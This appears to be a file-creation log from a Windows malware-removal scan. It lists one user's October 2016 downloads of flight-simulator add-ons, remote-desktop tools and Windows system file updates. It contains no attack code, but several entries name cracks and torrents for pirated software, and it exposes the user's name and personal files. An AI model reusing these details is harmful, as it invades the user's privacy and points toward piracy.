2016-10-09 16:31 - 2016-10-09 16:31 - 03833515 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.40.rar

2016-10-09 16:30 - 2016-10-09 16:30 - 00001827 _____ C:\Users\Kyle Aniel\Downloads\f-s9-f-s-x-f-s-u-i-p-c-440.torrent

2016-10-08 23:05 - 2016-10-08 23:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44936-B737-800

2016-10-08 23:04 - 2016-10-08 23:05 - 02745258 _____ C:\Users\Kyle Aniel\Downloads\44936-B737-800.zip

2016-10-08 22:57 - 2016-10-08 22:57 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit

2016-10-08 22:56 - 2016-10-08 22:56 - 25298732 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit.zip

2016-10-08 18:36 - 2016-10-08 18:36 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLSMD80&87

2016-10-08 18:30 - 2016-10-08 18:30 - 00017879 _____ C:\Users\Kyle Aniel\Downloads\[torrenty.to] [FSX]CLS MD81-82 and MD87 with serial.torrent

2016-10-08 17:50 - 2016-10-19 15:14 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\JustFlight

2016-10-08 17:37 - 2016-10-08 17:47 - 1172939413 _____ C:\Users\Kyle Aniel\Downloads\JF Tristar by iTrekx.rar

2016-10-08 17:28 - 2016-10-08 17:28 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\toml1011

2016-10-08 17:27 - 2016-10-08 17:27 - 10282684 _____ C:\Users\Kyle Aniel\Downloads\toml1011.zip

2016-10-08 17:06 - 2016-10-08 17:06 - 00599420 _____ C:\Users\Kyle Aniel\Downloads\[Free-scores.com]_gershwin-george-rhapsody-in-blue-31021.pdf

2016-10-08 16:20 - 2016-10-16 06:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aerosoft

2016-10-08 16:00 - 2015-04-17 13:46 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Aerosoft

2016-10-08 14:40 - 2016-10-08 14:40 - 01360299 _____ C:\Users\Kyle Aniel\Downloads\sky-textures-for-enb-series_12.zip

2016-10-08 14:14 - 2016-10-08 14:14 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX

2016-10-08 14:12 - 2016-10-08 14:13 - 02986348 _____ C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX.zip

2016-10-08 13:51 - 2016-10-08 13:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX

2016-10-08 13:11 - 2016-10-08 13:50 - 118588938 _____ C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX.zip

2016-10-08 12:22 - 2016-10-08 15:04 - 00000000 ____D C:\ProgramData\firebird

2016-10-08 12:21 - 2016-10-18 19:38 - 00000650 _____ C:\Users\banie_000\Desktop\PRO-ATC-X.lnk

2016-10-08 12:21 - 2016-10-08 12:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PRO-ATC-X

2016-10-08 12:18 - 2016-10-08 12:41 - 00000000 ____D C:\PRO-ATC-X

2016-10-08 12:08 - 2016-10-08 12:08 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8

2016-10-08 11:46 - 2016-10-08 11:51 - 236842241 _____ C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8.zip

2016-10-08 11:45 - 2016-10-08 11:45 - 00018526 _____ C:\Users\Kyle Aniel\Downloads\[www.seedpeer.eu] Fsx P3d Pointsoft Pro Atc X V1 2 3 8.SEEDPEER.torrent

2016-10-08 09:29 - 2016-10-08 09:30 - 68343766 _____ C:\Users\Kyle Aniel\Downloads\FSX How to autoland (ILS land) EASY - Tutorial.mp4

2016-10-08 09:28 - 2016-10-08 09:28 - 00002847 _____ C:\Users\Kyle Aniel\Downloads\mfp.htm

2016-10-08 07:21 - 2016-10-08 07:22 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger

2016-10-08 07:16 - 2016-10-08 07:20 - 09618253 _____ C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger.zip

2016-10-07 23:27 - 2016-10-07 23:27 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\b738american_fsx

2016-10-07 23:17 - 2016-10-07 23:26 - 27010695 _____ C:\Users\Kyle Aniel\Downloads\b738american_fsx.zip

2016-10-07 23:07 - 2016-10-07 23:07 - 16120277 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn (1).zip

2016-10-07 23:01 - 2016-10-07 23:01 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx

2016-10-07 22:59 - 2016-10-07 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones

2016-10-07 22:58 - 2016-10-07 22:58 - 06235914 _____ C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones.rar

2016-10-07 22:57 - 2016-10-07 23:00 - 16161514 _____ C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx.zip

2016-10-07 22:38 - 2016-10-07 22:39 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440 (1).zip

2016-10-07 22:36 - 2016-10-07 22:36 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an (1).zip

2016-10-07 22:35 - 2016-10-07 22:35 - 16120354 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn.zip

2016-10-07 22:34 - 2016-10-07 22:35 - 09891996 _____ C:\Users\Kyle Aniel\Downloads\tds738_american_airlines.zip

2016-10-07 22:34 - 2016-10-07 22:34 - 11109908 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-twa.zip

2016-10-07 22:34 - 2016-10-07 22:34 - 09932969 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-renoair.zip

2016-10-07 22:33 - 2016-10-07 22:33 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an.zip

2016-10-07 22:33 - 2016-10-07 22:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\american_n932an

2016-10-07 22:32 - 2016-10-07 22:33 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440.zip

2016-10-07 22:27 - 2016-10-07 22:27 - 13969822 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N909NN.zip

2016-10-07 22:26 - 2016-10-07 22:26 - 20893343 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N925NN.zip

2016-10-07 21:48 - 2016-10-07 21:55 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115 (1).exe

2016-10-07 21:25 - 2016-10-07 21:31 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115.exe

2016-10-07 21:17 - 2016-10-07 21:18 - 305520897 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload

2016-10-07 21:17 - 2016-10-07 21:18 - 00003413 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload.aamd

2016-10-07 20:58 - 2016-10-18 19:38 - 00001225 _____ C:\Users\banie_000\Desktop\Continue AndyOS Installation.lnk

2016-10-06 18:03 - 2016-10-06 18:03 - 02727678 _____ C:\Users\Kyle Aniel\Downloads\44582-B737-800.zip

2016-10-06 18:03 - 2016-10-06 18:03 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44582-B737-800

2016-10-06 17:59 - 2016-10-06 17:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture

2016-10-06 17:58 - 2016-10-06 17:58 - 14710813 _____ C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture.zip

2016-10-05 21:44 - 2016-10-05 21:44 - 05128495 _____ C:\Users\Kyle Aniel\Downloads\Windows 8 to OS X Yosemite (5th Edition).pdf

2016-10-05 18:12 - 2016-10-18 19:40 - 00001919 _____ C:\Users\Public\Desktop\BlueStacks.lnk

2016-10-05 18:12 - 2016-10-18 19:39 - 00001931 _____ C:\ProgramData\Microsoft\Windows\Start Menu\BlueStacks.lnk

2016-10-05 17:57 - 2016-10-05 18:12 - 00000000 ____D C:\Program Files (x86)\Bluestacks

2016-10-05 17:57 - 2016-09-29 07:00 - 00000000 ____D C:\ProgramData\Bluestacks

2016-10-05 17:55 - 2016-10-05 17:57 - 322368136 _____ (BlueStack Systems Inc.) C:\Users\Kyle Aniel\Downloads\BlueStacks2_native_5740d773271a7331d8c1a4ebc64792e5.exe

2016-10-05 05:34 - 2016-10-06 15:55 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\New folder

2016-10-04 19:59 - 2016-10-04 19:59 - 00597304 _____ C:\Users\Kyle Aniel\Downloads\flux-setup.exe

2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flux

2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\FluxSoftware

2016-10-04 19:43 - 2016-10-04 19:43 - 00000000 ___HD C:\$Windows.~WS

2016-10-04 19:42 - 2016-10-04 19:44 - 00000000 ____D C:\ESD

2016-10-04 19:41 - 2016-10-04 19:41 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool (1).exe

2016-10-04 19:35 - 2016-10-18 19:40 - 00001150 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk

2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox

2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\Program Files\Oracle

2016-10-04 19:35 - 2016-09-12 18:18 - 00920168 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxDrv.sys

2016-10-04 19:35 - 2016-09-12 18:17 - 00149256 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxUSBMon.sys

2016-10-04 19:34 - 2016-10-04 19:35 - 122288608 _____ (Oracle Corporation) C:\Users\Kyle Aniel\Downloads\VirtualBox-5.1.6-110634-Win.exe

2016-10-04 19:15 - 2016-10-04 19:15 - 01409778 _____ C:\Users\Kyle Aniel\Downloads\CA_U2M04L01_TE.pdf

2016-10-04 14:07 - 2016-10-04 14:07 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool.exe

2016-10-04 14:07 - 2016-10-04 14:07 - 00000000 ____D C:\$WINDOWS.~BT

2016-10-04 13:44 - 2016-10-04 13:44 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Splashtop

2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Splashtop

2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote

2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\Program Files (x86)\Splashtop

2016-10-04 13:41 - 2016-10-04 13:41 - 25636832 _____ (Splashtop Inc.) C:\Users\Kyle Aniel\Downloads\Splashtop_Streamer_Windows_v3.1.0.0.exe

2016-10-03 19:55 - 2016-10-03 19:55 - 00000000 ____D C:\ProgramData\Google

2016-10-03 19:50 - 2016-10-03 19:50 - 12427264 _____ C:\Users\Kyle Aniel\Downloads\chromeremotedesktophost.msi

2016-10-03 19:46 - 2016-10-03 19:47 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Deployment

2016-10-03 19:46 - 2016-10-03 19:46 - 00016108 _____ C:\Users\Kyle Aniel\Downloads\rdassistant.application

2016-10-03 19:46 - 2016-10-03 19:46 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Remote Desktop assistant

2016-10-03 19:40 - 2016-10-03 19:40 - 00000000 ____H C:\Users\Kyle Aniel\Documents\Default.rdp

2016-10-03 19:37 - 2016-10-20 05:19 - 00004020 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse

2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\SxS

2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Shapes

2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\resx

2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Resources

2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\FileTypes

2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Effects

2016-10-02 18:47 - 2016-10-02 18:47 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\737800AA

2016-10-02 18:40 - 2016-10-02 18:43 - 08687986 _____ C:\Users\Kyle Aniel\Downloads\737800AA.zip

2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (2).msi

2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (1).msi

2016-10-02 17:51 - 2016-10-02 17:52 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX (1).exe

2016-10-02 17:48 - 2016-10-02 17:49 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX.exe

2016-10-02 17:45 - 2016-10-02 17:46 - 2969567232 _____ C:\Users\Kyle Aniel\Downloads\FSX_Acceleration.iso

2016-10-02 17:41 - 2016-10-02 17:41 - 01520816 _____ C:\Users\Kyle Aniel\Downloads\DeluxeCrack.rar

2016-10-02 17:41 - 2016-10-02 17:41 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\DeluxeCrack

2016-10-02 17:38 - 2016-10-02 17:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Crackacceleration

2016-10-02 17:36 - 2016-10-02 17:36 - 01582010 _____ C:\Users\Kyle Aniel\Downloads\Crackacceleration.rar

2016-10-02 08:48 - 2016-10-02 08:52 - 142847356 _____ C:\Users\Kyle Aniel\Desktop\Captain Sim 777 demo.mp4

2016-10-02 08:33 - 2016-10-02 08:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\rrtrent800snd

2016-10-02 08:15 - 2016-10-02 08:16 - 54397943 _____ C:\Users\Kyle Aniel\Downloads\rrtrent800snd.zip

2016-10-02 08:10 - 2016-08-03 13:03 - 1115007685 ____N C:\Users\Kyle Aniel\Desktop\Th3.M2rt12n.15.007.M0viesC0unter.mp4

2016-10-02 07:29 - 2016-10-02 07:30 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\move

2016-10-01 21:29 - 2016-10-01 21:34 - 159565637 _____ C:\Users\Kyle Aniel\Desktop\EGLL Landing.mp4

2016-10-01 21:03 - 2016-10-01 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Expression

2016-10-01 18:52 - 2016-10-01 18:52 - 00000210 _____ C:\A320_.ini

2016-10-01 16:39 - 2016-10-01 16:44 - 1639972864 _____ C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-A320-A321_FSX-P3D-FSXSTEAM_V130a.rar

2016-10-01 15:36 - 2016-10-01 15:36 - 00000210 _____ C:\B752_.ini

2016-10-01 15:21 - 2016-10-01 15:21 - 00051530 _____ C:\Users\banie_000\Documents\1.ecs

2016-10-01 15:15 - 2016-10-01 15:15 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642.msi

2016-10-01 15:02 - 2016-10-01 15:02 - 00202240 _____ C:\Users\Kyle Aniel\Downloads\AirMouse.exe

2016-10-01 14:57 - 2016-10-01 14:57 - 22003144 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\PointerMouseServer.exe

2016-10-01 14:56 - 2016-10-01 14:56 - 01427704 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\MagicCPR.exe

2016-10-01 13:02 - 2016-10-01 13:02 - 00000136 _____ C:\Aircraft_cameras.INI

2016-10-01 12:42 - 2016-10-01 13:02 - 00000295 _____ C:\VC_cameras.INI

2016-10-01 12:35 - 2016-10-18 19:40 - 00001075 _____ C:\Users\Public\Desktop\English Manual.pdf.lnk

2016-10-01 12:33 - 2016-10-01 12:34 - 17538578 _____ C:\Users\Kyle Aniel\Downloads\EZDok Camera v1.18.7.rar

2016-10-01 11:20 - 2016-10-01 11:20 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ADE_170_Production

2016-10-01 11:18 - 2016-10-01 11:19 - 17085562 _____ C:\Users\Kyle Aniel\Downloads\ADE_170_Production.zip

2016-10-01 07:53 - 2016-10-01 07:53 - 181852854 _____ C:\Users\Kyle Aniel\Downloads\FSDT-KLAXv2.7z

2016-10-01 05:55 - 2016-10-20 05:18 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Youcam

2016-09-30 06:02 - 2016-09-30 06:02 - 00204479 _____ C:\Users\Kyle Aniel\Desktop\Taxes.pdf

2016-09-29 19:00 - 2016-09-29 19:00 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Custom Office Templates

2016-09-29 18:17 - 2016-09-29 18:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\csb777_200_aanc

2016-09-29 18:13 - 2016-09-29 18:16 - 09176585 _____ C:\Users\Kyle Aniel\Downloads\csb777_200_aanc.zip

2016-09-29 15:15 - 2016-09-15 10:22 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll

2016-09-29 15:15 - 2016-09-15 10:21 - 01000288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi

2016-09-29 15:15 - 2016-09-15 09:56 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManagerApi.dll

2016-09-29 15:15 - 2016-09-15 09:40 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll

2016-09-29 15:15 - 2016-09-15 09:40 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll

2016-09-29 15:15 - 2016-09-15 09:37 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll

2016-09-29 15:15 - 2016-09-15 09:36 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll

2016-09-29 15:15 - 2016-09-15 09:32 - 01037312 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll

2016-09-29 15:15 - 2016-09-15 09:23 - 03405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll

2016-09-29 15:15 - 2016-09-15 09:21 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll

2016-09-29 15:15 - 2016-09-15 09:20 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll

2016-09-29 15:15 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll

2016-09-29 15:14 - 2016-09-15 11:14 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll

2016-09-29 15:14 - 2016-09-15 10:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll

2016-09-29 15:14 - 2016-09-15 10:35 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll

2016-09-29 15:14 - 2016-09-15 10:33 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devenum.dll

2016-09-29 15:14 - 2016-09-15 10:30 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe

2016-09-29 15:14 - 2016-09-15 10:29 - 01377016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe

2016-09-29 15:14 - 2016-09-15 10:29 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll

2016-09-29 15:14 - 2016-09-15 10:29 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll

2016-09-29 15:14 - 2016-09-15 10:29 - 00512416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll

2016-09-29 15:14 - 2016-09-15 10:27 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe

2016-09-29 15:14 - 2016-09-15 10:27 - 00553312 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll

2016-09-29 15:14 - 2016-09-15 10:27 - 00434528 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll

2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll

2016-09-29 15:14 - 2016-09-15 10:23 - 00170960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll

2016-09-29 15:14 - 2016-09-15 10:21 - 01218912 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll

2016-09-29 15:14 - 2016-09-15 10:20 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll

2016-09-29 15:14 - 2016-09-15 10:20 - 00634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll

2016-09-29 15:14 - 2016-09-15 10:18 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll

2016-09-29 15:14 - 2016-09-15 10:16 - 01292640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll

2016-09-29 15:14 - 2016-09-15 10:16 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll

2016-09-29 15:14 - 2016-09-15 10:15 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys

2016-09-29 15:14 - 2016-09-15 10:14 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll

2016-09-29 15:14 - 2016-09-15 10:14 - 00119648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys

2016-09-29 15:14 - 2016-09-15 10:13 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll

2016-09-29 15:14 - 2016-09-15 10:13 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll

2016-09-29 15:14 - 2016-09-15 10:12 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll

2016-09-29 15:14 - 2016-09-15 10:11 - 00773168 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll

2016-09-29 15:14 - 2016-09-15 10:10 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll

2016-09-29 15:14 - 2016-09-15 10:10 - 00918848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll

2016-09-29 15:14 - 2016-09-15 10:06 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll

2016-09-29 15:14 - 2016-09-15 10:06 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll

2016-09-29 15:14 - 2016-09-15 10:06 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe

2016-09-29 15:14 - 2016-09-15 10:06 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll

2016-09-29 15:14 - 2016-09-15 10:06 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe

2016-09-29 15:14 - 2016-09-15 10:03 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll

2016-09-29 15:14 - 2016-09-15 10:03 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TempSignedLicenseExchangeTask.dll

2016-09-29 15:14 - 2016-09-15 10:03 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll

2016-09-29 15:14 - 2016-09-15 10:02 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll

2016-09-29 15:14 - 2016-09-15 10:01 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll

2016-09-29 15:14 - 2016-09-15 10:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll

2016-09-29 15:14 - 2016-09-15 09:59 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovslegacy.dll

2016-09-29 15:14 - 2016-09-15 09:58 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe

2016-09-29 15:14 - 2016-09-15 09:58 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll

2016-09-29 15:14 - 2016-09-15 09:57 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll

2016-09-29 15:14 - 2016-09-15 09:57 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe

2016-09-29 15:14 - 2016-09-15 09:56 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll

2016-09-29 15:14 - 2016-09-15 09:56 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll

2016-09-29 15:14 - 2016-09-15 09:56 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll

2016-09-29 15:14 - 2016-09-15 09:56 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll

2016-09-29 15:14 - 2016-09-15 09:55 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll

2016-09-29 15:14 - 2016-09-15 09:55 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe

2016-09-29 15:14 - 2016-09-15 09:55 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll

2016-09-29 15:14 - 2016-09-15 09:55 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll

2016-09-29 15:14 - 2016-09-15 09:55 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll

2016-09-29 15:14 - 2016-09-15 09:54 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll

2016-09-29 15:14 - 2016-09-15 09:54 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll

2016-09-29 15:14 - 2016-09-15 09:54 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll

2016-09-29 15:14 - 2016-09-15 09:53 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll

2016-09-29 15:14 - 2016-09-15 09:53 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll

2016-09-29 15:14 - 2016-09-15 09:52 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll

2016-09-29 15:14 - 2016-09-15 09:51 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll

2016-09-29 15:14 - 2016-09-15 09:51 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll

2016-09-29 15:14 - 2016-09-15 09:50 - 07219200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll

2016-09-29 15:14 - 2016-09-15 09:50 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll

2016-09-29 15:14 - 2016-09-15 09:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe

2016-09-29 15:14 - 2016-09-15 09:49 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll

2016-09-29 15:14 - 2016-09-15 09:47 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll

2016-09-29 15:14 - 2016-09-15 09:47 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll

2016-09-29 15:14 - 2016-09-15 09:46 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll

2016-09-29 15:14 - 2016-09-15 09:46 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll

2016-09-29 15:14 - 2016-09-15 09:46 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll

2016-09-29 15:14 - 2016-09-15 09:43 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2.dll

2016-09-29 15:14 - 2016-09-15 09:43 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll

